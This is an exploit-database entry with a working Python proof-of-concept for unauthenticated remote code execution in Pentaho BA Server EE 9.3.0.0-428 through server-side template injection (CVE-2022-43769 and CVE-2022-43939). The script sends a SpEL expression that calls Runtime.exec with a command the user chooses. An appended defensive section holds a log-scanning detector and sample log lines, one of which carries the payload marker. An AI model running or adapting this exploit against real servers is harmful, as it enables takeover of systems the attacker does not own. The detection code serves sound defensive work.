Pentaho BA Server EE 9.3.0.0-428 Server-Side Template Injection / Remote Code Execution

2023.04.05
Credit: dwbzn
Risk: Medium
Local: No
Remote: Yes
CWE: N/A

# Title: Pentaho BA Server EE 9.3.0.0-428 - RCE via Server-Side Template Injection (Unauthenticated)
# Author: dwbzn
# Date: 2022-04-04
# Vendor: https://www.hitachivantara.com/
# Software Link: https://www.hitachivantara.com/en-us/products/lumada-dataops/data-integration-analytics/download-pentaho.html
# Version: Pentaho BA Server 9.3.0.0-428
# CVE: CVE-2022-43769, CVE-2022-43939
# Tested on: Windows 11
# Credits: https://research.aurainfosec.io/pentest/pentah0wnage
# NOTE: This only works on the enterprise edition. Haven't tested it on Linux, but it should work (don't use notepad.exe).
# Unauthenticated RCE via SSTI using CVE-2022-43769 and CVE-2022-43939 (https://research.aurainfosec.io/pentest/pentah0wnage)

import requests
import argparse

parser = argparse.ArgumentParser(description='CVE-2022-43769 + CVE-2022-43939 - Unauthenticated RCE via SSTI')
parser.add_argument('baseurl', type=str, help='base url e.g. http://127.0.0.1:8080/pentaho')
parser.add_argument('--cmd', type=str, default='notepad.exe', nargs='?', help='command to execute (default notepad.exe)', required=False)
args = parser.parse_args()

# The SpEL expression is injected through the unauthenticated LDAP config endpoint's `url` parameter.
# Doubled braces are f-string escapes, so the request carries a single "#{...}" template.
url = f"{args.baseurl}/api/ldap/config/ldapTreeNodeChildren/require.js?url=%23{{T(java.lang.Runtime).getRuntime().exec('{args.cmd}')}}&mgrDn=a&pwd=a"

print("running...")
r = requests.get(url)
# The endpoint answers 'false' once the expression has been evaluated.
if r.text == 'false':
    print("command should've executed! nice.")
else:
    print("didn't work. sadge...")
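For defenders, an added detection example (not part of the exploit above or of Pentaho itself) that scans web-server access-log lines for requests to the ldapTreeNodeChildren endpoint whose query values decode to a SpEL template marker. The log format, regexes and sample lines are assumptions constructed for this example.

```python
# Added example: flag access-log lines that carry a SpEL expression in a
# query parameter of the Pentaho LDAP config endpoint named in the advisory.
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Endpoint fragment from the advisory; the exploit places its payload in `url=`.
TARGET_PATH = "/api/ldap/config/ldapTreeNodeChildren/"
# SpEL template markers: "#{" opens an expression, "T(" references a class.
SPEL_MARKERS = re.compile(r"#\{|\bT\(")

# Minimal combined-log parser (assumed format): client, request line, status.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')

def is_spel_injection(request_path: str) -> bool:
    """True when the request targets the LDAP tree endpoint and any query
    value decodes to something containing a SpEL expression marker."""
    parts = urlsplit(request_path)
    if TARGET_PATH not in parts.path:
        return False
    # parse_qs decodes percent-encoding once; decode again so a
    # double-encoded payload is still caught.
    for values in parse_qs(parts.query, keep_blank_values=True).values():
        for v in values:
            if SPEL_MARKERS.search(unquote(v)):
                return True
    return False

def scan_log(lines):
    """Return (client_ip, path, status) for each suspicious line."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        client, _method, path, status = m.groups()
        if is_spel_injection(path):
            hits.append((client, path, status))
    return hits

# Constructed sample log lines (not real traffic). The second line mirrors
# the advisory's request shape with the command portion omitted.
SAMPLE_LOG = [
    '10.0.0.5 - - [05/Apr/2023:10:00:01 +0000] "GET /pentaho/Login HTTP/1.1" 200 512',
    '10.0.0.9 - - [05/Apr/2023:10:00:02 +0000] "GET /pentaho/api/ldap/config/ldapTreeNodeChildren/require.js?url=%23%7BT(java.lang.Runtime)%7D&mgrDn=a&pwd=a HTTP/1.1" 200 5',
    '10.0.0.9 - - [05/Apr/2023:10:00:03 +0000] "GET /pentaho/api/ldap/config/ldapTreeNodeChildren/require.js?url=ldap://example.invalid&mgrDn=a&pwd=a HTTP/1.1" 200 5',
]

if __name__ == "__main__":
    for client, path, status in scan_log(SAMPLE_LOG):
        print(f"SpEL injection attempt from {client}: {path} (HTTP {status})")
```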


Copyright 2024, cxsecurity.com